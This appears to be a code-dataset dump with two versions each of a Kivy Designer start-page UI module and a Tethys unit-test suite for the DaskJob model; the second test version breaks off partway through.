row_force_default: True
row_default_height: '40sp'
spacing: '4sp'
padding: '16sp', '0sp'
DesignerLinkLabel:
id: kivy_label
text: ' Kivy'
link: 'http://kivy.org'
DesignerLinkLabel:
text: ' Kivy Designer Help'
on_release: root.dispatch('on_help')
DesignerLinkLabel:
id: kivy_label
text: ' Kivy Documentation'
link: 'http://kivy.org/docs'
DesignerLinkLabel:
text: ' Kivy Designer Documentation'
link: 'http://kivy-designer.readthedocs.org/'
Label:
text: 'Recent Projects'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
RecentFilesBox:
id: recent_files_box
pos_hint: {'center_x': 0.5}
size_hint_x: None
width: '600dp'
canvas.before:
Color:
rgba: (1, 1, 1, 0.05)
Rectangle:
pos: self.pos
size: self.size
<DesignerLinkLabel>:
color: (0, 0, 1, 1)
background_normal: theme_atlas('action_item')
background_disabled_normal: theme_atlas('action_item_disabled')
text_size: self.width, None
<RecentFilesBox>:
grid: grid
cols: 1
padding: '2sp'
size_hint_x: None
bar_width: '10dp'
scroll_type: ['bars', 'content']
GridLayout:
id: grid
cols: 1
size_hint_y: None
height: '1dp'
<RecentItem>:
orientation: 'vertical'
size_hint: 1, None
height: '40dp'
on_touch_down: if self.collide_point(*args[1].pos): root.dispatch('on_press')
canvas.after:
Color:
rgb: (0.2, 0.2, 0.2)
Rectangle:
pos: ((self.x+dp(25)), self.y)
size: ((self.width-dp(50)), dp(1))
Label:
text: root.path
text_size: self.size
valign: 'middle'
shorten: True
padding_x: '20dp'
""")
class DesignerLinkLabel(Button):
    '''DesignerLinkLabel displays a http link and opens it in a browser window
       when clicked.
    '''

    link = StringProperty(None)
    '''Contains the http link to be opened.
       :data:`link` is a :class:`~kivy.properties.StringProperty`
    '''

    def on_release(self, *args):
        '''Default event handler for 'on_release' event.
        '''
        # Only open a browser when a link has actually been set.
        if self.link:
            webbrowser.open(self.link)
class RecentItem(BoxLayout):
    '''One row in the recent-projects list; dispatches 'on_press' when
       touched (see the kv rule above).
    '''

    path = StringProperty('')
    '''Contains the application path
       :data:`path` is a :class:`~kivy.properties.StringProperty`
    '''

    # Register the custom 'on_press' event with kivy's dispatcher.
    __events__ = ('on_press', )

    def on_press(self, *args):
        '''Item pressed
        '''
class RecentFilesBox(ScrollView):
    '''Container consisting of buttons, with their names specifying
       the recent files.
    '''

    grid = ObjectProperty(None)
    '''The grid layout consisting of all buttons.
       This property is an instance of :class:`~kivy.uix.gridlayout`
       :data:`grid` is a :class:`~kivy.properties.ObjectProperty`
    '''

    def __init__(self, **kwargs):
        # NOTE(review): redundant override -- only forwards to the parent.
        super(RecentFilesBox, self).__init__(**kwargs)

    def add_recent(self, list_files):
        '''To add buttons representing Recent Files.
        :param list_files: array of paths
        '''
        for p in list_files:
            # Normalize byte paths to str using the filesystem encoding.
            if isinstance(p, bytes):
                p = p.decode(get_fs_encoding())
            recent_item = RecentItem(path=p)
            self.grid.add_widget(recent_item)
            recent_item.bind(on_press=self.btn_release)
            # Grow the grid so the ScrollView can scroll past its viewport.
            self.grid.height += recent_item.height
        self.grid.height = max(self.grid.height, self.height)

    def btn_release(self, instance):
        '''Event Handler for 'on_release' of an event.
        '''
        # Open the selected project in the main designer window.
        d = get_designer()
        d.ids.toll_bar_top._perform_open(instance.path)
class DesignerStartPage(BoxLayout):
    '''Landing page shown at startup: open/new project buttons, help
       links and the recent-projects list (layout defined in kv above).
    '''

    recent_files_box = ObjectProperty(None)
    '''This property is an instance
       of :class:`~designer.components.start_page.RecentFilesBox`
       :data:`recent_files_box` is a :class:`~kivy.properties.ObjectProperty`
    '''

    # Register the custom events fired by the kv buttons/links.
    __events__ = ('on_open_down', 'on_new_down', 'on_help')

    def on_open_down(self, *args):
        '''Default Event Handler for 'on_open_down'
        '''
        pass

    def on_new_down(self, *args):
        '''Default Event Handler for 'on_new_down'
        '''
        pass

    def on_help(self, *args):
        '''Default Event Handler for 'on_help'
        '''
        pass
| 27.495726 | 93 | 0.594809 | __all__ = [
'DesignerLinkLabel', 'RecentItem',
'RecentFilesBox' 'DesignerStartPage']
from utils.utils import get_designer, get_fs_encoding
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.uix.button import Button
import webbrowser
Builder.load_string("""
#: import theme_atlas utils.utils.theme_atlas
<DesignerButtonFit@DesignerButton>
size_hint_x: None
width: (self.texture_size[0]+sp(32))
<DesignerStartPage>:
btn_open: btn_open
btn_new: btn_new
recent_files_box: recent_files_box
orientation: 'vertical'
padding: (0, 0, 0, dp(20))
Label:
text: 'Kivy Designer'
font_size: '26pt'
size_hint_y: None
height: '40pt'
Label:
markup: True
text: '[i]Innovative User Interfaces, Desktop, and Mobile Development Made Easy.[/i]'
font_size: pt(12)
halign: 'center'
size_hint_y: None
height: '15pt'
GridLayout:
cols: 2
size_hint: None, None
height: self.minimum_height
width: self.minimum_width
pos_hint: {'center_x': 0.5}
padding: (0, pt(15), 0, 0)
spacing: '4sp'
DesignerButtonFit:
id: btn_open
text: 'Open Project'
on_release: root.dispatch('on_open_down')
DesignerButtonFit:
id: btn_new
text: 'New Project'
on_release: root.dispatch('on_new_down')
Label:
text: 'Getting Started'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
GridLayout:
kivy_label: kivy_label
cols: 2
size_hint: None, None
height: self.minimum_height
width: '450dp'
pos_hint: {'center_x': 0.5}
row_force_default: True
row_default_height: '40sp'
spacing: '4sp'
padding: '16sp', '0sp'
DesignerLinkLabel:
id: kivy_label
text: ' Kivy'
link: 'http://kivy.org'
DesignerLinkLabel:
text: ' Kivy Designer Help'
on_release: root.dispatch('on_help')
DesignerLinkLabel:
id: kivy_label
text: ' Kivy Documentation'
link: 'http://kivy.org/docs'
DesignerLinkLabel:
text: ' Kivy Designer Documentation'
link: 'http://kivy-designer.readthedocs.org/'
Label:
text: 'Recent Projects'
font_size: '16pt'
bold: True
size_hint_y: None
height: '30pt'
RecentFilesBox:
id: recent_files_box
pos_hint: {'center_x': 0.5}
size_hint_x: None
width: '600dp'
canvas.before:
Color:
rgba: (1, 1, 1, 0.05)
Rectangle:
pos: self.pos
size: self.size
<DesignerLinkLabel>:
color: (0, 0, 1, 1)
background_normal: theme_atlas('action_item')
background_disabled_normal: theme_atlas('action_item_disabled')
text_size: self.width, None
<RecentFilesBox>:
grid: grid
cols: 1
padding: '2sp'
size_hint_x: None
bar_width: '10dp'
scroll_type: ['bars', 'content']
GridLayout:
id: grid
cols: 1
size_hint_y: None
height: '1dp'
<RecentItem>:
orientation: 'vertical'
size_hint: 1, None
height: '40dp'
on_touch_down: if self.collide_point(*args[1].pos): root.dispatch('on_press')
canvas.after:
Color:
rgb: (0.2, 0.2, 0.2)
Rectangle:
pos: ((self.x+dp(25)), self.y)
size: ((self.width-dp(50)), dp(1))
Label:
text: root.path
text_size: self.size
valign: 'middle'
shorten: True
padding_x: '20dp'
""")
class DesignerLinkLabel(Button):
    '''Button styled as a hyperlink that opens its ``link`` URL in the
    system web browser when released.
    '''

    # URL to open on release; when unset (None/empty), releasing is a no-op.
    link = StringProperty(None)

    def on_release(self, *args):
        '''Open ``self.link`` in the default browser, if a link is set.'''
        target = self.link
        if target:
            webbrowser.open(target)
class RecentItem(BoxLayout):
    '''One row in the recent-projects list; dispatches ``on_press`` when
    touched (see the kv rule above, which forwards ``on_touch_down``).
    '''

    # Filesystem path of the recent project this row represents.
    path = StringProperty('')

    __events__ = ('on_press', )

    def on_press(self, *args):
        '''Default handler for the ``on_press`` event.

        Kivy requires a default handler for every event declared in
        ``__events__``; subscribers bind their own callbacks to the event.
        The original line had no body at all, which is a SyntaxError.
        '''
        pass
class RecentFilesBox(ScrollView):
    '''Scrollable list of recently opened projects shown on the start page.'''

    # Inner GridLayout that holds one RecentItem per project (set from kv).
    grid = ObjectProperty(None)

    def __init__(self, **kwargs):
        super(RecentFilesBox, self).__init__(**kwargs)

    def add_recent(self, list_files):
        '''Append one ``RecentItem`` row per path in *list_files*.

        Byte paths are decoded with the filesystem encoding before use.
        '''
        for entry in list_files:
            path = entry.decode(get_fs_encoding()) if isinstance(entry, bytes) else entry
            item = RecentItem(path=path)
            self.grid.add_widget(item)
            item.bind(on_press=self.btn_release)
            self.grid.height += item.height
        # Keep the grid at least as tall as the viewport so it fills the box.
        self.grid.height = max(self.grid.height, self.height)

    def btn_release(self, instance):
        '''Open the project whose row was pressed.'''
        designer = get_designer()
        designer.ids.toll_bar_top._perform_open(instance.path)
class DesignerStartPage(BoxLayout):
    '''Landing page shown when Kivy Designer starts.

    Hosts the Open/New project buttons, the help links and the recent
    projects list; button presses are re-dispatched as the page-level
    events declared in ``__events__`` (wired up in the kv rule above).
    '''
    # RecentFilesBox instance populated with recently opened projects.
    recent_files_box = ObjectProperty(None)
    __events__ = ('on_open_down', 'on_new_down', 'on_help')
    def on_open_down(self, *args):
        # Default handler for the 'Open Project' button; listeners bind to it.
        pass
    def on_new_down(self, *args):
        # Default handler for the 'New Project' button; listeners bind to it.
        pass
    def on_help(self, *args):
        # Default handler for the 'Kivy Designer Help' link; listeners bind to it.
        pass
| true | true |
f710388df0a9cbdd89b532dfa9a6713fd5628352 | 19,496 | py | Python | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | 1 | 2018-09-20T21:27:14.000Z | 2018-09-20T21:27:14.000Z | tests/unit_tests/test_tethys_compute/test_models/test_dask/test_DaskJob.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | [
"BSD-2-Clause"
] | null | null | null | from tethys_sdk.testing import TethysTestCase
from tethys_compute.models.dask.dask_scheduler import Scheduler, DaskScheduler
from tethys_compute.models.dask.dask_job import DaskJob
from django.contrib.auth.models import User
import dask
from unittest import mock
import time
@dask.delayed
def inc(x):
return x + 1
@dask.delayed
def double(x):
return x + 2
@dask.delayed
def add(x, y):
time.sleep(2)
return x + y
class DaskJobTest(TethysTestCase):
    """Unit tests for ``tethys_compute.models.dask.dask_job.DaskJob``.

    Covers the ``client``/``future`` properties, ``_execute`` with delayed
    and future arguments, status updates, result processing (including the
    processing-results lock), and job control (stop/pause/resume/retry).
    All Dask and Django persistence calls are mocked.
    """
    def set_up(self):
        self.user = User.objects.create_user('tethys_super', 'user@example.com', 'pass')
        self.scheduler = DaskScheduler(
            name='test_dask_scheduler',
            host='127.0.0.1:8000',
            timeout=10,
            heartbeat_interval=5,
            dashboard='test_dashboard',
        )
        self.scheduler.save()
    def tear_down(self):
        self.scheduler.delete()
    @mock.patch('tethys_compute.models.dask.dask_job.Client')
    def test_client_prop_with_invalid_scheduler(self, mock_client):
        mock_client.return_value = 'test_client'
        djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=None)
        # Execute
        ret = djob.client
        # Check result
        self.assertEqual('test_client', ret)
        mock_client.assert_called()
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    def test_client_prop_with_valid_scheduler(self, mock_client):
        mock_client.return_value = 'test_client'
        dask_scheduler = Scheduler.objects.get_subclass(name='test_dask_scheduler')
        djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=dask_scheduler)
        # Execute
        ret = djob.client
        # Check result
        self.assertEqual('test_client', ret)
        mock_client.assert_called_with(address='127.0.0.1:8000', heartbeat_interval=5, timeout=10)
    @mock.patch('tethys_compute.models.dask.dask_job.Client')
    def test_client_no_scheduler_prop(self, mock_client):
        mock_client.return_value = 'test_default_client'
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label')
        # Execute
        ret = djob.client
        # Check result
        self.assertEqual('test_default_client', ret)
        mock_client.assert_called_with()
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    @mock.patch('tethys_compute.models.dask.dask_job.Future')
    def test_future_prop(self, mock_future, mock_client):
        mock_client_ret = mock.MagicMock()
        mock_client.return_value = mock_client_ret
        mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # Get Scheduler Client from DaskJob using client property
        client = djob.client
        # Use this Client to run rando function with a future handler
        future = client.submit(inc, 1)
        # Get the key from future handler and assign it to DaskJob key to keep track of this inc function
        djob.key = future.key
        # Use DaskJob future property to get back the inc function
        ret = djob.future
        # Check result
        mock_future.assert_called_with(key='test_key', client=mock_client_ret)
        self.assertEqual(mock_future(), ret)
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    def test_future_prop_no_key(self, mock_client):
        mock_client_ret = mock.MagicMock()
        mock_client.return_value = mock_client_ret
        mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # Get Scheduler Client from DaskJob using client property
        client = djob.client
        # Use this Client to run inc function with a future handler
        client.submit(inc, 1)
        # Use DaskJob future property to get back the inc function
        ret = djob.future
        # Check result
        self.assertIsNone(ret)
    @mock.patch('tethys_compute.models.dask.dask_job.log')
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    @mock.patch('tethys_compute.models.dask.dask_job.Future')
    def test_future_prop_exception(self, mock_future, mock_client, mock_log):
        mock_client_ret = mock.MagicMock()
        mock_client.return_value = mock_client_ret
        mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
        mock_future.side_effect = Exception('exception in creating future')
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # Get Scheduler Client from DaskJob using client property
        client = djob.client
        # Use this Client to run inc function with a future handler
        future = client.submit(inc, 1)
        # Get the key from future handler and assign it to DaskJob key to keep track of this inc function
        djob.key = future.key
        # Use DaskJob future property to get back the inc function
        ret = djob.future
        # Check result
        self.assertIsNone(ret)
        mock_log.exception.assert_called_with('Dask Future Init Error')
    @mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
    @mock.patch('django.db.models.base.Model.save')
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    def test_execute_delayed(self, mock_client, mock_save, mock_ff):
        mock_client_ret = mock.MagicMock()
        mock_client.return_value = mock_client_ret
        mock_future = mock.MagicMock(key='test_key')
        mock_client_ret.compute.return_value = mock_future
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # Delayed option
        delayed = dask.delayed(inc)(1)
        # _Execute
        djob._execute(delayed)
        # Check result
        mock_client_ret.compute.assert_called_with(delayed)
        self.assertEqual('test_key', djob.key)
        mock_save.assert_called()
        mock_ff.assert_called_with(mock_future)
    @mock.patch('tethys_compute.models.dask.dask_job.isinstance')
    @mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
    @mock.patch('django.db.models.base.Model.save')
    @mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
    def test_execute_future(self, mock_client, mock_save, mock_ff, mock_isinstance):
        mock_client.return_value = mock.MagicMock()
        mock_isinstance.side_effect = [True, False]
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler
        )
        # get client from DaskJob
        client = djob.client
        # Future option
        future = client.submit(inc, 2)
        # _Execute
        djob._execute(future)
        # Check result
        self.assertEqual(future.key, djob.key)
        mock_save.assert_called()
        mock_ff.assert_called_with(future)
    def test_execute_not_future_delayed(self):
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler
        )
        # _Execute
        self.assertRaises(ValueError, djob._execute, 1)
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
    @mock.patch('django.db.models.base.Model.save')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    def test_update_status(self, mock_future, mock_save, mock_client):
        mock_future.status = 'finished'
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler
        )
        # call the function
        djob._update_status()
        # check the results
        mock_client.close.assert_called()
        mock_save.assert_called()
    def test_update_status_with_no_future(self):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # check the results
        self.assertIsNone(djob._update_status())
    @mock.patch('tethys_compute.models.dask.dask_job.log')
    @mock.patch('django.db.models.base.Model.save')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    def test_update_status_exception(self, mock_future, mock_save, mock_log):
        # Invalid status key
        mock_future.status = 'foo'
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler
        )
        # call the function
        djob._update_status()
        # check the results
        mock_log.error.assert_called_with('Unknown Dask Status: "foo"')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
    def test_process_result_with_failed_lock(self, mock_re_lock, mock_apl):
        mock_apl.return_value = False
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
                       _process_results_function='test_function')
        # call the function
        self.assertIsNone(djob._process_results())
        # check the result
        mock_re_lock.assert_not_called()
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
                new_callable=mock.PropertyMock(return_value=None))
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
    def test_process_result_no_future(self, mock_apl, _):
        mock_apl.return_value = True
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
                       _process_results_function='test_function')
        # call the function
        self.assertIsNone(djob._process_results())
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
                new_callable=mock.PropertyMock())
    def test_process_result_forget(self, _, mock_client):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler, forget=True)
        # call the function
        ret = djob._process_results()
        # check the result
        mock_client.close.assert_called()
        self.assertIsNone(ret)
    @mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
    def test_process_result_with_result_function(self, mock_re_lock, mock_apl, mock_client, mock_future, mock_tfe):
        fake_key = 'sum_faef'
        mock_function_extractor = mock.MagicMock()
        mock_function = mock.MagicMock(return_value='foo')
        mock_function_extractor.valid = True
        mock_function_extractor.function = mock_function
        mock_tfe.return_value = mock_function_extractor
        mock_apl.return_value = True
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler,
            _process_results_function='test_function'
        )
        djob.key = fake_key
        # call the function
        djob._process_results()
        # check the result
        mock_client.close.assert_called()
        mock_client.gather.assert_called_with(mock_future)
        mock_function.assert_called_with(mock_client.gather())
        mock_client.set_metadata.assert_called_with(fake_key, False)
        self.assertEqual('', djob.key)
        mock_re_lock.assert_called()
    @mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
    @mock.patch('tethys_compute.models.dask.dask_job.log')
    def test_process_result_with_client_gather_exception(self, mock_logger, mock_re_lock, mock_apl, mock_client,
                                                         mock_future, mock_tfe):
        mock_function_extractor = mock.MagicMock()
        mock_function = mock.MagicMock(return_value='foo')
        mock_function_extractor.valid = True
        mock_function_extractor.function = mock_function
        mock_tfe.return_value = mock_function_extractor
        mock_apl.return_value = True
        gather_exception = Exception('Fake exception')
        mock_client.gather.side_effect = gather_exception
        # Create DaskJob
        djob = DaskJob(
            name='test_dj',
            user=self.user,
            label='label',
            scheduler=self.scheduler,
            _process_results_function='test_function'
        )
        # call the function
        djob._process_results()
        # check the result
        mock_client.gather.assert_called_with(mock_future)
        mock_logger.warning.assert_called()
        mock_function.assert_called_with(gather_exception)
        mock_re_lock.assert_called()
    @mock.patch('django.db.models.base.Model.save')
    @mock.patch('tethys_compute.models.dask.dask_job.log')
    @mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
    def test_process_result_with_result_function_with_exception(self, mock_re_lock, mock_apl, _, mock_client,
                                                                mock_tfe, mock_log, mock_save):
        mock_function_extractor = mock.MagicMock()
        mock_function = mock.MagicMock()
        mock_function.side_effect = Exception
        mock_function_extractor.valid = True
        mock_function_extractor.function = mock_function
        mock_tfe.return_value = mock_function_extractor
        mock_apl.return_value = True
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
                       _process_results_function='test_function')
        # call the function
        djob._process_results()
        # check the result
        mock_log.exception.assert_called_with('Process Results Function Error')
        self.assertEqual('ERR', djob._status)
        mock_save.assert_called()
        mock_re_lock.assert_called()
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    def test_stop(self, mock_future):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # call the stop function
        djob.stop()
        # Check result
        mock_future.cancel.assert_called()
    def test_pause(self):
        djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
        # Execute and check result
        self.assertRaises(NotImplementedError, djob.pause)
    def test_resume(self):
        djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
        # Execute and check result
        self.assertRaises(NotImplementedError, djob.resume)
    def test_result(self):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # need to convert to string because it will convert to string when saving to the database
        djob.result = 'serialized_results'
        # call the function
        ret = djob.result
        # Check result
        self.assertEqual('serialized_results', ret)
    def test_result_none(self):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        djob.result = None
        # call the function
        ret = djob.result
        # Check result
        self.assertIsNone(ret)
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    def test_done(self, mock_future):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # call the done function
        ret = djob.done()
        # Check result
        mock_future.done.assert_called()
        self.assertEqual(mock_future.done(), ret)
    def test_done_with_no_future(self):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # Check result
        self.assertIsNone(djob.done())
    def test_update_status_interval_prop(self):
        from datetime import timedelta
        # Create DaskJob
        djob = DaskJob(name='test_daskjob', user=self.user, label='label')
        djob.save()
        ret = DaskJob.objects.get(name='test_daskjob').update_status_interval
        # Check result
        self.assertIsInstance(ret, timedelta)
        self.assertEqual(timedelta(0, 0), ret)
        djob.delete()
    @mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
    def test_retry(self, mock_future):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # call the done function
        djob.retry()
        # Check result
        mock_future.retry.assert_called()
    def test_retry_no_future(self):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        # call the done function
        self.assertIsNone(djob.retry())
    @mock.patch('tethys_compute.models.dask.dask_job.log')
    def test_fail_acquire_pr_lock(self, mock_log):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        djob.extended_properties['processing_results'] = True
        self.assertFalse(djob._acquire_pr_lock())
        mock_log.warning.assert_called_with('Unable to aquire lock. Processing results already occurring. Skipping...')
    @mock.patch('django.db.models.base.Model.save')
    def test_fail_release_pr_lock(self, mock_save):
        # Create DaskJob
        djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
        djob.extended_properties['processing_results'] = True
        djob._release_pr_lock()
        self.assertFalse(djob.extended_properties['processing_results'])
        mock_save.assert_called()
| 36.237918 | 119 | 0.671933 | from tethys_sdk.testing import TethysTestCase
from tethys_compute.models.dask.dask_scheduler import Scheduler, DaskScheduler
from tethys_compute.models.dask.dask_job import DaskJob
from django.contrib.auth.models import User
import dask
from unittest import mock
import time
@dask.delayed
def inc(x):
return x + 1
@dask.delayed
def double(x):
return x + 2
@dask.delayed
def add(x, y):
time.sleep(2)
return x + y
class DaskJobTest(TethysTestCase):
def set_up(self):
self.user = User.objects.create_user('tethys_super', 'user@example.com', 'pass')
self.scheduler = DaskScheduler(
name='test_dask_scheduler',
host='127.0.0.1:8000',
timeout=10,
heartbeat_interval=5,
dashboard='test_dashboard',
)
self.scheduler.save()
def tear_down(self):
self.scheduler.delete()
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_prop_with_invalid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=None)
ret = djob.client
self.assertEqual('test_client', ret)
mock_client.assert_called()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_client_prop_with_valid_scheduler(self, mock_client):
mock_client.return_value = 'test_client'
dask_scheduler = Scheduler.objects.get_subclass(name='test_dask_scheduler')
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=dask_scheduler)
ret = djob.client
self.assertEqual('test_client', ret)
mock_client.assert_called_with(address='127.0.0.1:8000', heartbeat_interval=5, timeout=10)
@mock.patch('tethys_compute.models.dask.dask_job.Client')
def test_client_no_scheduler_prop(self, mock_client):
mock_client.return_value = 'test_default_client'
djob = DaskJob(name='test_dj', user=self.user, label='label')
ret = djob.client
self.assertEqual('test_default_client', ret)
mock_client.assert_called_with()
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop(self, mock_future, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
future = client.submit(inc, 1)
djob.key = future.key
ret = djob.future
mock_future.assert_called_with(key='test_key', client=mock_client_ret)
self.assertEqual(mock_future(), ret)
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_future_prop_no_key(self, mock_client):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
client.submit(inc, 1)
ret = djob.future
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
@mock.patch('tethys_compute.models.dask.dask_job.Future')
def test_future_prop_exception(self, mock_future, mock_client, mock_log):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_client_ret.submit.return_value = mock.MagicMock(key='test_key')
mock_future.side_effect = Exception('exception in creating future')
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
client = djob.client
future = client.submit(inc, 1)
djob.key = future.key
ret = djob.future
self.assertIsNone(ret)
mock_log.exception.assert_called_with('Dask Future Init Error')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_delayed(self, mock_client, mock_save, mock_ff):
mock_client_ret = mock.MagicMock()
mock_client.return_value = mock_client_ret
mock_future = mock.MagicMock(key='test_key')
mock_client_ret.compute.return_value = mock_future
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
delayed = dask.delayed(inc)(1)
djob._execute(delayed)
mock_client_ret.compute.assert_called_with(delayed)
self.assertEqual('test_key', djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(mock_future)
@mock.patch('tethys_compute.models.dask.dask_job.isinstance')
@mock.patch('tethys_compute.models.dask.dask_job.fire_and_forget')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_scheduler.Client')
def test_execute_future(self, mock_client, mock_save, mock_ff, mock_isinstance):
mock_client.return_value = mock.MagicMock()
mock_isinstance.side_effect = [True, False]
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
client = djob.client
future = client.submit(inc, 2)
djob._execute(future)
self.assertEqual(future.key, djob.key)
mock_save.assert_called()
mock_ff.assert_called_with(future)
def test_execute_not_future_delayed(self):
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
self.assertRaises(ValueError, djob._execute, 1)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('django.db.models.base.Model.save')
